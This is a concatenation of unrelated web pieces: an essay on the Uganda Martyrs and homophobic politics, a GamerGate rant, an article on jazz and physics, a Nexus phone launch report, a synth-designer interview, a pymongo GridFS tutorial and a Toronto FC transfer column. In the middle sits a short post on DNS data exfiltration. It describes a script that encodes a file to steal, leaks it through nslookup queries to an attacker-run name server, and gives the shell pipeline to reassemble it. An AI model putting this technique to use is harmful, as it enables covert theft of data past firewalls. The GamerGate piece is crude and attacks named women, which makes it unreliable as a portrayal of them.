By far the most high-profile international story to come out of Uganda of late has been the passing of the anti-homosexuality bill. This has been covered both here and elsewhere extensively, so when I came to Uganda I made a conscious decision not to write about it – other people could do it with greater insight and expertise. However, over the weekend I visited the Uganda Martyrs shrine at Namugongo on the outskirts of Kampala – a Catholic memorial to thirty two members of Kabaka Mwanga's court, put to death in 1886 for converting to Christianity under the influence of European missionaries. Twenty two of the Catholic martyrs were canonized in 1964 and the significance of their act to the international community of Catholics has been marked with visits by the pope in 1969 and 1993. However, the other side of the story is that the Martyrs were executed because they refused to have sex with the absolutist Kabaka Mwanga, an act of disobedience that could not be tolerated.
Largely for the above reason, the “˜Uganda Martyrs' have gained some international attention recently and have been re-animated to take their place within the country's contemporary debate on homosexuality. However, references to the martyrs in this debate, including that made by Richard Dowden on this blog, have simply stated that the men were put to death by Kabaka Mwanga because they refused to sleep with him. This explanation seems to run counter to the “˜official' explanation of the Catholic Church, which sets them out as martyrs to their beliefs as Christians. It seems to me to be slightly more complicated that this – both explanations are true, but connected. The Uganda Martyrs refused to have sex with the Kabaka because they were Christians and persuaded of its sinfulness by newly-acquired learning from the bible. Such an interpretation raises some interesting questions (and problems) for those propounding the explanation that homosexuality is un-African and its origins are external to the continent.
Mwanga II was Kabaka for a relatively short period in the 1880s, during which time Europeans were beginning to exert influence on the Buganda kingdom. This came in the form of missionaries arriving during the rule of the more (in)famous Kabaka, Mutesa, who had welcomed them to the kingdom and invited them to carry out their work there. One result was a number of Christian converts within the large royal court. Mwanga saw this as a threat to his political control of Buganda and reacted violently to representatives of the new faith – a British missionary, Bishop Hannington, was captured and killed under the orders of Mwanga in 1885.
Mwanga also attempted to reverse the conversion of his kingdom and executed the Christian converts within the court either by beheading or burning. There is an account of the event, “˜Black Martyrs', written by a British Catholic priest called J.P Thoonen, which quotes a Buganda man called Kiwanuka (see John Blevins' “When Sodomy Leads to Martyrdom” for a more complete account.) This introduces the parallel, but associated, element of homosexuality into the story of the martyrs: “At that time, the king practised the works of Sodom. Moslems and pagans were prepared to do those things with the king, but the Catholics absolutely refused. For that reason the king began to detest us, and deliberated with the pagans and Moslems about putting us to death, us the Catholics”. So, according to Thoonen, the martyrs refused to sleep with the probably bi-sexual Kabaka Mwanga because they were Christians, not because this kind of sexual practice was particularly unusual among the Baganda at the time.
Blevins actually looks through the contemporary source material and finds scant reference to this refusal to have sex with Mwanga as a reason for the executions, coming to the conclusion that whilst this element of the account is likely to be true, it was the European take on the events that elevated it in importance. Further evidence for the missionaries and their sponsors that Christianity, and with it “˜civilisation', should be brought upon these people of the African interior.
The site of the martyrs' execution, now in the outskirts of Kampala at Namugongo, has become an important place of pilgrimage for East Africa's Catholic community. Every year the anniversary of the executions is marked on June 3rd as “˜Martyrs Day' – a public holiday across Uganda. This has grown to become a gathering of more than a million Catholics, many coming from a far as neighbouring Kenya and Tanzania, and is probably the most important Christian pilgrimage in Africa. The explanation you get from the current tour guide at Namugongo is also interesting. Whilst the story of Mwanga being gay is not immediately volunteered, when asked about it our guide was happy to accept that this was probably true, but I got no sense that he thought this detracted from the fact that the men were Christian martyrs.
As mentioned, the story of the Ugandan Martyrs has gained resonance of late due to the passing of the anti-homosexuality bill and the international controversy surrounding its latent and illiberal homophobia. President Museveni, whilst never keen on the legislation, did not let this stop him using the story of the martyrs' refusal to submit to Mwanga's own sexual proclivities for his own political gain. The president and his cabinet, along with other dignitaries and, of course, influential members of the Catholic Church in Uganda, attend the main Catholic mass on Martyrs Day, celebrated in the grounds of the Namugongo shrine. During his 2010 speech at the event, Museveni stated: “The African Church is the only one that is still standing against homo-sexuality. The Europeans are finished. If we follow them, we shall end up in Sodom and Gomorrah… I hear there was homosexuality in Mwanga's palace. This was not part of our culture. I hear he learnt it from the Arabs. But the martyrs refused these falsehoods and went for the truth, which is why we are honouring them today.”
Museveni's explanation that Mwanga “˜learnt it [homosexuality] from the Arabs' is a fairly popular one, but Blevins argues that it is unlikely that Mwanga “˜learnt it' from Muslims because they had little influence on his court. This followed the execution of over 70 Muslim converts under Mwanga's father, Mutesa, a decade earlier. Like Christianity, Islam was seen as a threat to Mwanga's political control of his kingdom.
The episode of the Ugandan Martyrs actually shows that homosexuality, or at least the act of men having sex with other men, needed no external influence to exist in pre-colonial Buganda. But the politically motivated execution of the Christian converts continues to be used by this generation of Ugandan leaders to strengthen their role as guardians of Ugandan culture and with it their hold on national political power.
Magnus Taylor is Editor of African Arguments.
So long and thanks for all the coverage…I guess
While I'm glad doxxes against Pro #GamerGate voices are finally being covered in the media, albeit the adjunct blogoshphere, I wish it wasn't in such a telling way. I have a couple of serious issues with the way the report on Liz's doxxing went down on Daily Kos (what happened to you once shiny bastion of light? How thy light has faded).
For starters: Why now? Where was the coverage of these doxxes/threats/swatts, and general harassment against other ProGG people these last 6 months? All it took was a pretty face (and such a pretty face it is) to finally garner some — any — coverage; even though she openly said herself she doesn't want this (she is likely the only one taking the FBI's advice).
So, the one time a proGG person being doxxed is covered, they do it against her wishes…swell. Even in our moment of vindication, as journos begrudgingly admit the world is round, there's a twinge of disrespect thrown into our conciliatory glass of wine.
My second issue with this article is the deceptive way in which the author only tangentially links Liz to #GamerGate, saying “In covering GamerGate, one woman who considers herself a men's right activist, was willing to speak to me.”
This makes it seems like she is part of this as a spokesperson for Men's Rights and not as an OUTSPOKEN #GamerGate supporter. This is desceptive in two ways:
It distances the harassment of a pro #GamerGate woman away from #GamerGate. While this isn't outright stating “women in GamerGate still either do not exist or are not being harassed” it does leave a heavy implication. Point 2 doesn't matter because they'll never cover threats/doxxes/swatts against male #GamerGate supporters.
The Author then goes on to blame threats/harassment/doxxing/swatting against women on men, exclusively. This is incredibly dishonest — and ironic — since, during the same article, he lists Wu, Quinn, AND Harper — all well known harassers/doxxers — as victims. It contradicts itself so wonderfully…sigh…hipsters and their irony.
The author brings up the point that, while men do get threats, they aren't often sexual in nature. This is a spurious argument for one obvious reason: when women send threats to other women they're usually not sexual in nature since most women are straight and don't often use sex as an insult in the way men do (sexual dimorphism and all that). The same holds true when women send threats to men; “you're gonna threaten rape against me? Are you hot?”… it just doesn't carry the same weight and threats, on the internet, are all about eliciting an emotional response. A man will send rape threats to a woman AND threats of sexual violence to other men. Usually, it's along the lines of “I'll rape your sister/wife/mother/ etc” or “I'm going to rape you with XYZ object”.
It's arguable that rape threats against woman are worse in tone, but it's certainly not worse in sincerity since both are equally actionable and, often times, neither are.
Lastly, and this is what pisses me off the most: the bullshit ‘CYA' PR spin at the end when the author explicitly calls for levity in coverage of the incident. For the past 6 months, every single allegation of threats/doxxing/swatting levied against #GamerGate by each of the other antiGG woman listed in the very same article have been politicized to hell and back across the entire left wing media apparatus and beyond. GamerGate has been linked to threats/doxxes/swattings and associated, ideologically, with the KKK, ISIS, and violence against POC in Ferguson, MI. These left wing culture warriors, championing their best O'Reilly impressions, have crafted a false equivalency between our calls for free speech (principally) and support for artistic integrity to a mass shooting in Canada and the justification for the unfortunate murders in France. All of this has happened without a single shred of evidence to support these allegations or self awareness from journalists who promote the likes of Jonathan McIntosh, Leigh Alexander, and Brianna Wu.
Not once before was there a call to refrain from politicizing the issue among the left wing blogosphere. In fact, the “issue” of #GamerGate was immediately turned into one of a political nature. Erroneous lines were drawn between MRA's and Feminists or the political right wing and left. Every single 2 bit click bait journo and blogger with an axe to grind - and personal twitter army - turned #GamerGate into their personal call to arms.
Then the second irrefutable and inconvenient hard evidence (and by hard evidence I mean the same unsupported by fact allegations backed up by self fulfilling fuzzy logic) that could unravel the entire narrative in which THEY'RE the good guys and WE'RE the bad guys comes to like (that ProGG women are being harassed), they flip flop and call for calmer nerves and clearer minds.
For the past 6 months trolls didn't exist and every single one of societies ill's were laid almost directly at the soles of #GamerGate's collective feet. Once a terrible, and professionally/thoroughly done, doxxing of such a high profile proGG female happens (and it was inevitable) these far left blog sites remember how the internet works.
I appreciate your concern…I just wish next time you'd buy me a drink before you jerk me off.
Scientists need hobbies. The grueling work of navigating complex theory and the politics of academia can get to a person, even one as laid back as Dartmouth professor and astrophysicist Stephon Alexander. So Alexander plays the saxophone, though at this point it may not be accurate to call his avocation a spare time pursuit, since John Coltrane has become as important to him as Einstein, Kepler, and Newton.
Coltrane, he says in a 7-minute TED talk above, “changed my whole research direction… led to basically a discovery in physics.” Alexander then proceeds to play the familiar opening bars of "Giant Steps." He's no Coltrane, but he is a very creative thinker whose love of jazz has given him a unique perspective on theoretical physics, one he shares, it turns out, with both Einstein and Coltrane, both of whom saw music and physics as intuitive, improvisatory pursuits.
Alexander describes his jazz epiphany as occasioned by a complex diagram Coltrane gave legendary jazz musician and University of Massachusetts professor Yusef Lateef in 1967. "I thought the diagram was related to another and seemingly unrelated field of study—quantum gravity,” he writes in a Business Insider essay on his discovery, “What I had realized... was that the same geometric principle that motivated Einstein's theory was reflected in Coltrane's diagram.”
The theory might “immediately sound like untestable pop-philosophy,” writes the Creators Project, who showcase Alexander's physics-inspired musical collaboration with experimental producer Rioux (sample below). But his ideas are much more substantive, “a compelling cross-disciplinary investigation,” recently published in a book titled The Jazz of Physics: The Secret Link Between Music and the Structure of the Universe.
Alexander describes the links between jazz and physics in his TED talk, as well as in the brief Wired video further up. “One connection,” he says, is “the mysterious way that quantum particles move.... According to the rules of quantum mechanics," they "will actually traverse all possible paths.” This, Alexander says, parallels the way jazz musicians improvise, playing with all possible notes in a scale. His own improvisational playing, he says, is greatly enhanced by thinking about physics. And in this, he's only following in the giant steps of both of his idols.
It turns out that Coltrane himself used Einstein's theoretical physics to inform his understanding of jazz composition. As Ben Ratliff reports in Coltrane: The Story of a Sound, the brilliant saxophonist once delivered to French horn player David Amram an “incredible discourse about the symmetry of the solar system, talking about black holes in space, and constellations, and the whole structure of the solar system, and how Einstein was able to reduce all of that complexity into something very simple.” Says Amram:
Then he explained to me that he was trying to do something like that in music, something that came from natural sources, the traditions of the blues and jazz. But there was a whole different way of looking at what was natural in music.
This may all sound rather vague and mysterious, but Alexander assures us Coltrane's method is very much like Einstein's in a way: “Einstein is famous for what is perhaps his greatest gift: the ability to transcend mathematical limitations with physical intuition. He would improvise using what he called gedankenexperiments (German for thought experiments), which provided him with a mental picture of the outcome of experiments no one could perform.”
Einstein was also a musician—as we've noted before—who played the violin and piano and whose admiration for Mozart inspired his theoretical work. “Einstein used mathematical rigor,” writes Alexander, as much as he used “creativity and intuition. He was an improviser at heart, just like his hero, Mozart.” Alexander has followed suit, seeing in the 1967 “Coltrane Mandala” the idea that “improvisation is a characteristic of both music and physics.” Coltrane “was a musical innovator, with physics at his fingertips,” and “Einstein was an innovator in physics, with music at his fingertips.”
Alexander gets into a few more specifics in his longer TEDx talk above, beginning with some personal background on how he first came to understand physics as an intuitive discipline closely linked with music. For the real meat of his argument, you'll likely want to read his book, highly praised by Nobel-winning physicist Leon Cooper, futuristic composer Brian Eno, and many more brilliant minds in both music and science.
Related Content:
Free Online Physics Courses
The Musical Mind of Albert Einstein: Great Physicist, Amateur Violinist and Devotee of Mozart
CERN's Cosmic Piano and Jazz Pianist Jam Together at The Montreux Jazz Festival
Bohemian Gravity: String Theory Explored With an A Cappella Version of Bohemian Rhapsody
Josh Jones is a writer and musician based in Durham, NC. Follow him at @jdmagness
What is it?
Bad guys are using various methods to exfiltration data from organization or any target.basiclly they need to exfiltration data without being detected.most of the organizations use firewalls and IDS to secure their network but allowing DNS(incoming/outgoing) 😀 so over the dns we can ttransferfiles and other important stuff 😉 here i wrote a simple C# script to demonstrate the attack.For Educational Purposes Only
How does it work?
The idea is simple, the script will encode your data and split it into small parts and make nslookup requests to a remote server, then parse the logs on the remote server and decode the file.
Prerequisite
Linux boxes with DNS a server also you need to enable dns query logging 🙂
DnsExfiltration Script
this is how my configatution files looks like
Getting started
Download and edit DnsExfiltration Script static String Domain = “YOUR-DOMAIN-NAME”; //add your bind domain static String NSserver = “YOUR-NAME-SERVER”;//add your dns server ip address Call ConvertInto64(string FileTosteal,string PathTosaveEncodedFile) function in main method call SendFile(string PathTosaveEncodedFile) in linux box open terminal and run this command to Reassemble the file egrep -o “[a-zA-Z0-9+/]+={0,2}[a-zA-Z0-9+/]+={0,2}.YOUR-DOMAIN-NAME” /var/log/qrlog | cut -d . -f1 | uniq | awk ‘!a[$0]++' > /pathToSave/file.bin base64 -d file.bin > decoded.jpg Done!
Demo Video
i tested this script with following file types and its working 🙂
jpg 1Mb
mp3 3MB
exe 1MB
Happy Hacking!
Reference
https://community.infoblox.com/t5/Community-Blog/DNS-Data-Exfiltration-How-it-works/ba-p/3664
Advertisements
Hands on with Google's new Nexus phones 11:00 Google has unleashed two sizes of new Nexus phones, the Nexus 5X and 6P
Google today showcased two Nexus phones, two new Chromecast devices, and a Pixel C tablet with a magnetically attached keyboard, in a major string of announcements in San Francisco overnight.
Google also announced new features for its newly minted Android 6.0 Marshmallow operating system, new features of Google Photos, and showcased Chromecast audio, a new device that you can attach to old speakers and network them with Google Play music.
The Pixel C tablet comes with a full sized keyboard that magnetically attaches to the tablet and charges inductively from it.
Read Next
Features of Google Marshmallow demonstrated today included Now on Tap, an extension of Google Now that will automatically offer content specific information based on the tasks you are performing at the time. So if you find a restaurant using the Yelp App, Now on Tap can automatically prompt you to make a restaurant booking using the OpenTable app, or suggest you access your favourite taxi app.
The new Android app drawer takes note not only of the apps you use, but also the time of day and location you use them. So if you regularly use a transport app in the morning, it will show as one of the first apps in your app drawer when you are nearby.
Both new Nexus phones use Google's new Marshmallow operating system and both feature the new USB Type-C ports. These ports allow for fast data transfers and also for fast charging devices. Both have fingerprint readers that Google calls Nexus Imprint on the back of the phones that showcase Google's new in-built fingerprint scanning support.
In the US both devices are fairly inexpensive but the falling Australian dollar means even relatively cheap phones will cost a lot more. There are no official local prices yet, however, prices did appear briefly overnight on Google Store in Australia before being removed.
The Nexus 5X, made by LG, was $659 and the Nexus 6P, made by Huawei, was $899. But nothing is confirmed.
Nexus 5X (LG)
The new Nexus 5X phone. Picture: Getty Images.
LG's Nexus 5X is the smaller of the two phones with a high resolution 423 pixels per inch, 5.2-inch 1080p display. It's powered by a Qualcomm Snapdragon 808 Processor and has 12.3 and 5 megapixel cameras and can capture 4K and slow motion video.
Australia is not among the first group of countries to receive the Nexus 5X but LG, who manufactured the 5X, says it will roll out in additional countries starting on October 19.
Specifications
· Chipset: 1.8 GHz Qualcomm Snapdragon 808
· Operating System: Android 6.0 Marshmallow
· Display: 5.2-inch Full HD IPS (1920 x 1080/423ppi)
· Memory: 2GB RAM / 16 or 32GB storage
· Cameras: 12.3MP with F2.2 aperture, front: 5MP
· Battery: 2,700mAh (non removable)
· Size: 147 x 72.6 x 7.9mm
· Weight: 136g
· Network: LTE-A Cat 6
· Connectivity: Wi-Fi 802.11 ac, Bluetooth, NFC, Type-C USB
· Colors: Carbon / Quartz / Ice
· Other: 4K Video / Dual Flash / IR Laser Auto-Focus / Fingerprint sensor
Nexus 6P (Huawei)
The new Google Nexus 6P. Picture: AP.
This is the first time Huawei has teamed up with Google to make a Nexus phone. The Nexus 6P features a 5.7-inch display the same size as on Samsung's phablet sized Galaxy Note 5 and Edge+ smartphones, and a tad bigger than iPhone 6 Plus.
The display is a wide form of Quad HD (WQHD) and sharp with 518 pixels per inch resolution, and it features high resolution 12 and 8 megapixel cameras. It has laser assisted focusing and a burst mode you access by pressing down on the camera button. Eight megapixels is particularly large resolution for a front-facing, or selfies, camera. Cameras can be accessed by double tapping the home button.
It has a Nexus Imprint fingerprint scanner on the back and USB Type-C for fast charging and data transfer.
· Chipset: Qualcomm Snapdragon 808
· Operating System: Android 6.0 Marshmallow
· Display: 5.7-inch AMOLED display (1440x2560/515ppi)
· Memory: 3GB RAM / 32, 64 and 128GB storage
· Cameras: 12.3MP front: 8MP
· Battery: 3450mAh (not removable)
· Size: 159.3x77.8x7.3mm
· Weight: 178g
· Network: LTE
· Connectivity: Wi-Fi 802.11 ac, Bluetooth, NFC, Type-C USB
· Colours: Silver, black, white and gold
· Other: 4K Video / Dual Flash / IR Laser Auto-Focus / Fingerprint sensor
Pixel C tablet with magnetic detachable keyboard
The new Google Pixel C tablet. Picture AP.
The Pixel C tablet has a 2560x1800 pixel, 10.2 inch display, with an unusual aspect ratio of 1:square root of 2. Google says this aspect ratio lets the tablet be comfortably viewed in portrait and landscape with the soft keyboard open.
It has an Nvidea Tegra X1 chip set with a Maxwell desktop-type graphics processor and 3GB of memory, and will run Android Marshmallow.
I tested the keyboard and it offered a reasonable amount of travel. A few key have been removed to allow for a larger key size, but Google says they are the least used symbol keys and are available on the soft keyboard.
The keyboard attaches magnetically to the tablet both when closed and opened. It can be attached at any angle between 100 and 135 degrees.
The keyboard charges inductively from the tablet. The keyboard also offers two months of daily activity without charging.
Chris Griffith travelled to San Francisco courtesy of Huawei.
Battle of the smartphones
Chris Griffith Technology Reporter Sydney Chris is one of Australia's most experienced technology reporters, with an involvement in the computer industry spanning almost 50 years. He learned to program in the late 1960s, studied computer science in the... Read more
Setting the agenda for Australia's $150BN agribusiness sector The program for Australia's premier agribusiness conference - The Global Food Forum - is set. Hear from more than 30 industry leaders including PepsiCo's CEO, Danny Celoni, Jayne Hrdlicka, CEO of A2 Milk Company, Barry Irvin, Executive Chairman, Bega Cheese and Costco's Managing Director, Patrick Noone. Sheraton Grand Sydney Hyde Park Book Now
Read Next
But I've also read studies from the old Philips laboratories in the Netherlands that show orchestras average deviation from 440 Hz was measured over many concerts and was seen to differ by a few Hz, usually slightly below. Pretty anal. Some people obviously really cared that 440 Hz was being adhered to in practice.
Why 440 Hz was chosen in the first place is another interesting story, but looking at the resonances of water and sound is a great place to start, or read up on cymatics. If you aren't already familiar with it, that is.
TT: So many things are standardised that you don't really think about because they were there before you started using it. 440 Hz was brought about to standardise the way people play together and, yeah, someone can bring a guitar to a piano and it would work together because of that standard.
It's like how a green light means you can cross the road or if you shake your head sideways it means no. Those two standards will help you through life in many places around the world. But it's dangerous to enforce standards in creativity. I have a son who's started school in Japan, where every kid will paint the sun red. Now that is some fucked up standardisation! Just really messed up on so many levels.
Anyway, I'm not going into that whole 432 Hz vs 440 Hz debate. (BTW: I absolutely love cymatics and I've done some nice workshops for kids with it.) But I will say different frequencies sound different, so why not use that in your music? You got to use whatever feels right and the monologue let's you do exactly that with pitch.
RDJ: Yep.
TT: Talking of standards, the sample rate of 48 kHz is another one for sampling and signal processing, but the volca sample uses a weird one at 31.25 kHz. Purely because of technical constraints, but I was thinking that might be part of the reason you liked it so much, because the different sample rate gives it a unique sound.
RDJ: Haha, yes, it was pretty much the first thing I noticed. Yeah, I thought the 48 kHz, was based on the Nyquist Theorem. I think it's double what humans can apparently hear or something, which is another weird one. I don't know how anybody worked out humans only hear to 20 kHz. I mean even if you can't hear above 20 kHz, it doesn't mean that your body doesn't feel it. You don't just experience sound through your eardrums. A good example of this is listening to a recording of your own voice. To almost everyone apart from maybe the most narcissistic, it always sounds weird/thinner/smaller, as you don't feel the vibration of your chest and body. There are other reasons of course but that's one for sure. Anyway, I'm into the extremes of the audio spectrum, ultra clarity 'n' all but I probably prefer fucked-muffled/lo-bit/'70s sound more, ha!
TT: Oh, and when something defies the standard – I just remembered the first time I played a Yamaha SK-10, the faders were all upside down, like max was downwards, even on the volume. I didn't know what was going on and it threw me off at first, but it's actually a bit fun like that and you soon realise it all comes from organ drawbars.
RDJ: I never played the SK-10, but these Calrec mixers I use are like that also, the faders are backwards. There is a little dip switch inside to change it, but I think they have them like that for TV/broadcasting, coz if someone falls asleep at the desk they don't want them to push all the faders up and distort two million TVs at once… Not surprising they have this safeguard considering how skull numbingly boring most TV is.
TT: Right!! Yeah, but there is a certain feeling to pulling rather than pushing. It's like how an orgasm is "coming" in English, but it's “going” [iku] in Japanese.
RDJ: Never thought of it like that.
TT: I mean, written text in Japanese was traditionally vertical. Although now a lot is westernised and horizontal.
RDJ: Ah, that's kinda sad… So traditional Japanese text is like trackers and now it's going like Cubase! :)
TT: I sometimes wonder what Japanese synths would have looked like if they didn't copy Moog in the '70s. You've got to think about what is convention and what is really a good design.
In some previous posts on mongodb and python and pymongo, I introduced the NoSQL database MongoDB and how you can use it from Python. This post goes beyond the basics of MongoDB and pymongo to give you a taste for MongoDB's take on filesystems, GridFS.
Why a filesystem?
If you've been doing MongoDB for a while, you may have heard about the 16 MB document size limit. When I started using MongoDB (around version 0.8), the limit was actually 4 MB. What this means is that everything is working just fine, your system is screaming fast, until you try to create a document that's 4.001 MB and boom nothing works any more. For us at SourceForge, what that meant was that we had to restructure our schema and use less embedding.
But what if it's not something that can be restructured? Maybe your site allows users to upload large attachments of unknown size. In such cases you probably can get away with using a Binary field type and crossing your fingers, but a better solution, in my opinion, is to actually store the contents your upload in a series of documents (let's call them "chunks") of limited size. Then you can tie them all together with another document that specifies all the file metadata.
GridFS to the rescue
Well, that's exactly what GridFS does, but it does it with a nice API with a few more bells and whistles than you'd probably build on your own. It's important to note that GridFS, implemented in all the MongoDB language drivers, is a convention and an api, not something that's provided natively by the server. As far as the server is concerned, it's all just collections and documents.
The GridFS schema
GridFS actually stores your files in two collections, named by default fs.files and fs.chunks, although you can change the fs to something else if you'd like. The fs.files collection is where reading or writing a file begins. A typical fs.files document looks like the following (credit):
{ // unique ID for this file "_id" : <unspecified>, // size of the file in bytes "length" : data_number, // size of each of the chunks. Default is 256k "chunkSize" : data_number, // date when object first stored "uploadDate" : data_date, // result of running the "filemd5" command on this file's chunks "md5" : data_string }
The fs.chunks collection contains all the data for your files:
{ // object id of the chunk in the _chunks collection "_id" : <unspecified>, // _id of the corresponding files collection entry "files_id" : <unspecified>, // chunks are numbered in order, starting with 0 "n" : chunk_number, // the chunk's payload as a BSON binary type "data" : data_binary, }
In the Python gridfs package (included with the pymongo driver), several other fields are inserted as well:
filename This is the 'human' name for the file, which may be path-delimited to simulate directories. contentType This is the mime-type of the file encoding This is the unicode encoding used for text files.
You can also add in your own attributes to files. At SourceForge, we used things like project_id or forum_id to allow the same filename to be uploaded to multiple places on the site without worrying about namespace collisions. To keep your code future-proof, you should put any custom attributes inside an embedded metadata document, just in case the gridfs spec expands to incorporate more fields.
Using GridFS
So with all that out of the way, how to you actually use GridFS? It's actually pretty straightforward. The first thing you need is a reference to a GridFS filesystem:
>>> import pymongo >>> import gridfs >>> conn = pymongo.Connection() >>> db = conn.gridfs_test >>> fs = gridfs.GridFS(db)
Basic reading and writing
Once you have the filesystem, you can start putting stuff in it:
>>> with fs.new_file() as fp: ... fp.write('This is my new file. It is teh awezum!')
Let's examine the underlying collections to see what actually happened:
>>> list(db.fs.files.find()) [{u'length': 38, u'_id': ObjectId('4fbfa7b9fb72f096bd000000'), u'uploadDate': datetime.datetime(2012, 5, 25, 15, 39, 37, 55000), u'md5': u'332de5ca08b73218a8777da69293576a', u'chunkSize': 262144}] >>> list(db.fs.chunks.find()) [{u'files_id': ObjectId('4fbfa7b9fb72f096bd000000'), u'_id': ObjectId('4fbfa7b9fb72f096bd000001'), u'data': Binary('This is my new file. It is teh awezum!', 0), u'n': 0}]
You can see that there's really nothing surprising or mysterious happening there; it's just mapping the filesystem metaphor onto MongoDB documents. In this case, our file was small enough that it didn't need to be split into chunks. We can force split it by specifying a small chunkSize when creating the file:
>>> with fs.new_file(chunkSize=10) as fp: ... fp.write('This is file number 2. It should be split into several chunks') ... >>> fp <gridfs.grid_file.GridIn object at 0x1010f5950> >>> fp._id ObjectId('4fbfa8ddfb72f0971c000000') >>> list(db.fs.chunks.find(dict(files_id=fp._id))) [{... u'data': Binary('This is fi', 0), u'n': 0}, {... u'data': Binary('le number ', 0), u'n': 1}, {... u'data': Binary('2. It shou', 0), u'n': 2}, {... u'data': Binary('ld be spli', 0), u'n': 3}, {... u'data': Binary('t into sev', 0), u'n': 4}, {... u'data': Binary('eral chunk', 0), u'n': 5}, {... u'data': Binary('s', 0), u'n': 6}]
Now, if we actually want to read the file as a file, we'll need to use the gridfs api:
>>> with fs.get(fp._id) as fp_read: ... print fp_read.read() ... This is file number 2. It should be split into several chunks
Treating it more like a filesystem
There are several other convenience methods bundled into the GridFS object to give more filesystem-like behavior. For instance, new_file() takes any number of keyword arguments that will get added onto the fs.files document being created:
>>> with fs.new_file( ... filename='file.txt', ... content_type='text/plain', ... my_other_attribute=42) as fp: ... fp.write('New file') ... >>> fp <gridfs.grid_file.GridIn object at 0x1010f59d0> >>> db.fs.files.find_one(dict(_id=fp._id)) {u'contentType': u'text/plain', u'chunkSize': 262144, u'my_other_attribute': 42, u'filename': u'file.txt', u'length': 8, u'uploadDate': datetime.datetime(2012, 5, 25, 15, 53, 1, 973000), u'_id': ObjectId('4fbfaaddfb72f0971c000008'), u'md5': u'681e10aecbafd7dd385fa51798ca0fd6'}
Better would be to encapsulate my_other_attribute into the metadata property:
>>> with fs.new_file( ... filename='file2.txt', ... content_type='text/plain', ... metadata=dict(my_other_attribute=42)) as fp: ... fp.write('New file 2') ... >>> db.fs.files.find_one(dict(_id=fp._id)) {u'contentType': u'text/plain', u'chunkSize': 262144, u'metadata': {u'my_other_attribute': 42}, u'filename': u'file2.txt', u'length': 10, u'uploadDate': datetime.datetime(2012, 5, 25, 15, 54, 5, 67000), u'_id':ObjectId('4fbfab1dfb72f0971c00000a'), u'md5': u'9e4eea3dec28d8346b52f18086437ac7'}
We can also "overwrite" files by filename, but since GridFS actually indexes files by _id, it doesn't get rid of the old file, it just versions it:
>>> with fs.new_file(filename='file.txt', content_type='text/plain') as fp: ... fp.write('Overwrite the so-called "New file"') ...
Now, if we want to retrieve the file by filename, we can use get_version or get_last_version:
>>> fs.get_last_version('file.txt').read() 'Overwrite the so-called "New file"' >>> fs.get_version('file.txt', 0).read() 'New file'
Since we've been uploading files with a filename property, we can also list the files in gridfs:
>>> fs.list() [u'file.txt', u'file2.txt']
We can also remove files, of course:
>>> fp = fs.get_last_version('file.txt') >>> fs.delete(fp._id) >>> fs.list() [u'file.txt', u'file2.txt'] >>> fs.get_last_version('file.txt').read() 'New file'
Note that since only one version of "file.txt" was removed, we still have a file named "file.txt" in the filesystem.
Finally, gridfs also provides convenience methods for determining if a file exists and for quickly writing a short file into grifs:
>>> fs.exists(fp._id) False >>> fs.exists(filename='file.txt') True >>> fs.exists({'filename': 'file.txt'}) # equivalent to above True >>> fs.put('The quick brown fox', filename='typingtest.txt') ObjectId('4fbfad74fb72f0971c00000e') >>> fs.get_last_version('typingtest.txt').read() 'The quick brown fox'
So that's the whirlwind tour of GridFS. I'd love to hear how you're using GridFS in your project, or if you think it might be a good fit, so please drop me a line in the comments.
You know it when you hear it. An explanation that just doesn't make sense. It may be an employee's sudden return to health on the Tuesday after a long weekend or in the case of Toronto FC, the explanation as to why the deal for Swedish International Defender Olof Mellberg fell through.
If I am to believe a source close to the negotiations, I've got the answer. After hearing it, unlike that employee taking an extended holiday, I actually do feel sick. Sometimes not knowing is better than knowing.
The official storyline is that Toronto and Mellberg were in negotiations. However, as Kurtis Larson of the Sun reported "the deal fell apart as a result of the league's salary cap, a complicated system that played a role in breaking down negotiations between two sides."
The Agent for Mellberg, Anders Wallsten was quoted by Larson as saying "There was great interest, all I will say is that it wasn't because of the player that a deal didn't go through. You'll have to talk to the league and the club."
For his part, Commissioner Don Garber went on national TV during the MLS All Star game and indicated that the league didn't nix the deal. He indicated that it "economically didn't make sense for (Toronto). It was a decision they felt wasn't in their best interest."
From Toronto's perspective, when questioned by Nigel Reed on The Soccer Show, Director of Soccer Operations & Head Coach Paul Mariner offered "no comment" when asked about why the deal never went through. TFC's Director of Team and Player Operations Earl Cochrane did provide a carefully crafted statement which acknowledged interest from player and club but "in the end, his contract requirements didn't work for the MLS salary structure and therefore us. We accepted that and moved on."
Like the employee calling in sick, something didn't add up. I get that the MLS salary structure is complicated. But what didn't sit right with me was that the league pays the salaries up to the max. Amounts above that are paid by the team and the player only carries a maximum cap hit of $335k. In fact, mid-season, this cap hit is pro-rated to be half that amount. It's not that complicated after all. If the team wants to overpay a player, it's their money. As long as it fits, what's the issue?
Toronto also had plenty of cap room having shed the salaries of Joao Plata, Julian de Guzman, Nick Soolsma and Miguel Aceval. They also had a designated player space open as a result of the de Guzman trade.
According to a source close to the negotiations, the deal was in fact done with the player, agent and club agreeing to terms which would have seen Mellberg come in as the club's 3rd Designated Player. A handsomely rewarded one at that.
However, according to my source, the league did in fact nix the deal and they allegedly did it for two reasons.
First, they felt it was too much money to spend on a Defender. In fact, of the thirty-one current Designated Players (DP) in the MLS today only one,Rafeal Marquez of the New York Red Bulls, is a Defender. In fact, of the fifty-three DPs that have played in this league past and present, Marquez is the only Defender. This source feels as though the league just doesn't think that Defenders are a priority for the highly paid DP spot. The numbers seem to back that view up and it appears as clear as day as to the league's intent and interest area when it comes to signing DP contracts.
Why do they have appeared to have a problem spending money on Defenders? That leads us to the second, and perhaps most disturbing suggestion as to why the league is alleged to have nixed the deal. Apparently, MLS felt that Mellberg (and Defenders in general) wouldn't help sell tickets in markets around the league. If that is true, why would the league allow the Marquez deal and not Mellberg?
Well, the arrival of Marquez followed on the heels of Thierry Henry's transfer (and the opening of Red Bull Arena. The deal itself has been rumoured to have some peculiar nuances. Jordan Beard in an interesting piece, reported that 'the Marquez transfer fee, "pegged at more than €6 million" was lowered to $0 for the Red Bulls'. While we can speculate as to what debt ridden FC Barcelona was looking for in the deal, certainly, we can acknowledge that the arrival of both players helped generate interest in New York and ideally some spin off for the new stadium. Both of which help the league immensely. This is consistent with my source's view that the league wants designated players that it can use to boost its revenues.
Marquez is a well known Mexican International who most recently played for one of the most popular teams in the world, FC Barcelona. Might spark a ticket sale or two. A relatively unknown, but good, Swedish International that most recently played for Olympiacos? Unless the name is Elin Nordegren, not so much.
